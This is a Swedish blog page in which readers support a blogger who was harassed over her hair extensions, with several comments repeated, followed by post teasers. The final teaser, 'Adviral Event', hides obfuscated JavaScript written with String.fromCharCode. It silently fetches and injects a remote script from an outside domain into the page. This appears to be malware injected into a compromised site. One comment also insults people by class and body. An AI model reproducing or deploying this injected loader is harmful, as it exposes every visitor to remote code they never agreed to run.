 51. Men alltså… på riktigt??? Förlåt My, men jag vet faktiskt inte om jag ska skratta eller gråta 😳 Vad är det med människor?? Åter igen. På riktigt?? Jag äter en flitig läsare av din blogg. Jag följer dig på ig. Varför? Jo, för att en gång såg jag dig i Ensam mamma söker. Jag tyckte att du verkade så reko och så himla lik mig 🙈 Jag är dock typ 12-13 år äldre än vad du är. Hur som helst. Jag hittade din blogg och din ig och jag läser och följer pga jag gillat dig. Hade jag inte gjort det, så kan väl vilken kvastskaft som helst räkna ut att då hade jag lagt min tid på ngt annat 🤔 HUR kan man då, är min fråga, lägga sin energi på hat? Jag kan verkligen inte förstå. Men jag är säkert trög på nåt vis. Jag har ju oxå extensions till och från 😳😂😘😘

 52. Fy så arg man blir!!!
  Jag tycker att du är tuff och ärlig som står för dina åsikter och olikheter. Precis som du skriver ombyte förnöjer! Frågan jag ställer mig är: har alla dessa människor alltid samma klädstil, själv varierar jag mig med att ibland ha sköna lite slappare kläder, ibland snygga tighta kläder och ibland myser jag i mysbyxor…
  Det är ju variationen som gör det!
  Nej skäms till er alla vidriga nättroll och fortsätt du att vara samma härliga my, du inspirerar!

  Kramar från falun

 53. Men vad är det jag läser?! Vuxna människor sitter alltså och mobbar för att någon valt att sätta i slingor av extensions eller väljer att förlänga naglarna på salong i stället för hemma?! ? Jag blir CHOCKAD!
  Vad i helskotta gör det en till en sämre mamma eller ens en ytlig mamma?
  Om man sätter på sig den där fluffiga tröjan i en härlig färg, sätter färg på läpparna eller lockar upp håret en dag – hur har det med uppfostran att göra?
  Så om man skiter totalt i sig själv så är man en bättre mamma?
  Dom kommentarerna kallar jag YTA! Där har vi folk som inte kan tänka steget längre!
  My, anmäl kommentarerna. Det är inte okej nånstans. Det är en psykisk käftsmäll och fan inte bättre än en fysisk! ?
  My, du är så vacker oavsett. Fortsätt att ”göra dig fin” som du vill. Du är underbart vacker oavsett och Lilleman lyser av stolthet när han är med dig ❤️❤️
  Haters gona hate!!

 54. Hej Fina!!
  Har följt dig ända sen du var med i ”Ensam mamma söker” Tycker du värkar vara en supertrevlig o go människa, som bryr sig om allt o alla, särskilt din fina lilleman..
  Läser om alla påhopp o trakesserier mot dig…Ärligt talat alla dom där ute som har några fördomar mot dig, är så avundsjuka…Förstår att det är jobbigt, men du vet vilka som är dina vänner…Galet sjukt att man orkar lägga ner så mkt energi på att klaga o slänga så mkt skit på ngn…Sträck på dig fina My..du är snygg, vältränad, bästa mamma…Älskar din blogg..
  Kram??

 55. När jag läser de fula kommentarerna så slår det mig att de är väldigt ”lika” skrivna”… lite osannolikt att en massa olika läsare använder ”!?” och ”!!!!!!!” gällande samma fråga. Många av orden är så lika också. Jag misstänker faktiskt att det är en och samma person som skrivit de olika kommentarerna. Kanske under olika namn och i vissa fall från olika IP-adresser (man kan ju ha tillgång till olika datorer).

  • Jag tog ett axplock av alla som jag har fått… Jag ser också många likheter mellan vissa (även bland dom som ni inte ser) jag är ganska säker p¨å att vissa troll gömmer sig bakom flera identiteter… hmm…

 56. Men vad är det jag läser?! Vuxna människor sitter alltså och mobbar för att någon valt att sätta i slingor av extensions eller väljer att förlänga naglarna på salong i stället för hemma?! 😱 Jag blir CHOCKAD!

  Vad i helskotta gör det en till en sämre mamma eller ens en ytlig mamma?

  Om man sätter på sig den där fluffiga tröjan i en härlig färg, sätter färg på läpparna eller lockar upp håret en dag – hur har det med uppfostran att göra?
  Så om man skiter totalt i sig själv så är man en bättre mamma?

  Dom kommentarerna kallar jag YTA! Där har vi folk som inte kan tänka steget längre!

  My, anmäl kommentarerna. Det är inte okej nånstans. Det är en psykisk käftsmäll och fan inte bättre än en fysisk! 😡

  My, du är så vacker oavsett. Fortsätt att ”göra dig fin” som du vill. Du är underbart vacker oavsett och Lilleman lyser av stolthet när han är med dig ❤️❤️

  Haters gona hate!!

 57. När jag läste överskiften tänkte jag att du hade fått en massa hat, pga den där dokumentären som gick, och att folk skulle säga att det var oetiskt mm….
  Men det verkar ju inte alls vara det som det handlar om… eller så har folk bara väldigt svårt att föra fram sina åsikter på ett normalt sätt?!
  Jag tycker förövrigt att du är fin i både det naturliga håret och med löshåret, löshåret ser ju ändå naturligt ut!! På vissa ser det ju mest bara ut som det hänger något dött där… antar att det beror på vilken frisör man går till.

 58. Hur någon kan ifrågasätta dig som Mamma tycker jag är hemskt… Inte för att jag känner dig mer än genom bloggen… Men att du gör allt för din Lilleman är ju något som verkar självklart, och han ser då ut som ett lyckligt barn!!

 59. Tror absolut inte som någon skrev här att det var ungdomar som skrivit dessa fula ord, ungdomar lägger ingen energi på så mycket äldre människor än de själva är. Tror inte heller att det är några anonyma personer för de känner ju inte dig personligen, tror snarare att det är någon som känner dig eller rör sig i samma kretsar som dig, skulle inte bli förvånad om det är dessa medelålders bloggtanters hat som triggats igång igen av ditt löshår, du har ju haft ett elände med dessa avundsjuka medelålders tanter förut, som är avundsjuka på din ungdom, ditt utseende, din framåtanda, din självständighet, din självförsörjning, dina nya studier till mäklare, det måste ju helt enkelt bli för mycket för dem som lever med täta gubbar och har jobb som sitt utseende, som sagt avundsjuka är ett permanent tillstånd hos de som är drabbade och det får de dras med hela livet, denna avundsjukan kommer aldrig från personer med akademisk bakgrund utan från lägsta socialgruppen som aldrig klarade någon skol eller yrkesutbildning, de är livrädda att bli omsprungna av dig så enkelt är det.
  Stå på dig, (de är säkerligen också avundsjuka på din nya fina kille som inte har hängmage och är tjock ful o lönnfet.

 60. Hej Fina!!
  Har följt dig ända sen du var med i ”Ensam mamma söker” Tycker du värkar vara en supertrevlig o go människa, som bryr sig om allt o alla, särskilt din fina lilleman..
  Läser om alla påhopp o trakesserier mot dig…Ärligt talat alla dom där ute som har några fördomar mot dig, är så avundsjuka…Förstår att det är jobbigt, men du vet vilka som är dina vänner…Galet sjukt att man orkar lägga ner så mkt energi på att klaga o slänga så mkt skit på ngn…Sträck på dig fina My..du är snygg, vältränad, bästa mamma…Älskar din blogg..
  Kram🌸💗

 61. När jag läser de fula kommentarerna så slår det mig att de är väldigt ”lika” skrivna”… lite osannolikt att en massa olika läsare använder ”!?” och ”!!!!!!!” gällande samma fråga. Många av orden är så lika också. Jag misstänker faktiskt att det är en och samma person som skrivit de olika kommentarerna. Kanske under olika namn och i vissa fall från olika IP-adresser (man kan ju ha tillgång till olika datorer).

  • Jag tog ett axplock av alla som jag har fått… Jag ser också många likheter mellan vissa (även bland dom som ni inte ser) jag är ganska säker p¨å att vissa troll gömmer sig bakom flera identiteter… hmm…

 62. När jag läste överskiften tänkte jag att du hade fått en massa hat, pga den där dokumentären som gick, och att folk skulle säga att det var oetiskt mm….
  Men det verkar ju inte alls vara det som det handlar om… eller så har folk bara väldigt svårt att föra fram sina åsikter på ett normalt sätt?!
  Jag tycker förövrigt att du är fin i både det naturliga håret och med löshåret, löshåret ser ju ändå naturligt ut!! På vissa ser det ju mest bara ut som det hänger något dött där… antar att det beror på vilken frisör man går till.

 63. Hur någon kan ifrågasätta dig som Mamma tycker jag är hemskt… Inte för att jag känner dig mer än genom bloggen… Men att du gör allt för din Lilleman är ju något som verkar självklart, och han ser då ut som ett lyckligt barn!!

 64. Tror absolut inte som någon skrev här att det var ungdomar som skrivit dessa fula ord, ungdomar lägger ingen energi på så mycket äldre människor än de själva är. Tror inte heller att det är några anonyma personer för de känner ju inte dig personligen, tror snarare att det är någon som känner dig eller rör sig i samma kretsar som dig, skulle inte bli förvånad om det är dessa medelålders bloggtanters hat som triggats igång igen av ditt löshår, du har ju haft ett elände med dessa avundsjuka medelålders tanter förut, som är avundsjuka på din ungdom, ditt utseende, din framåtanda, din självständighet, din självförsörjning, dina nya studier till mäklare, det måste ju helt enkelt bli för mycket för dem som lever med täta gubbar och har jobb som sitt utseende, som sagt avundsjuka är ett permanent tillstånd hos de som är drabbade och det får de dras med hela livet, denna avundsjukan kommer aldrig från personer med akademisk bakgrund utan från lägsta socialgruppen som aldrig klarade någon skol eller yrkesutbildning, de är livrädda att bli omsprungna av dig så enkelt är det.

  Stå på dig, (de är säkerligen också avundsjuka på din nya fina kille som inte har hängmage och är tjock ful o lönnfet.

 65. Jag ville bara skriva att du är en grym tjej. Dessa som skriver massa skit om vad du gör och inte gör är bara avundsjuka. Ta hand om dej och din Lilleman.

 66. Jag ville bara skriva att du är en grym tjej. Dessa som skriver massa skit om vad du gör och inte gör är bara avundsjuka. Ta hand om dej och din Lilleman.

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/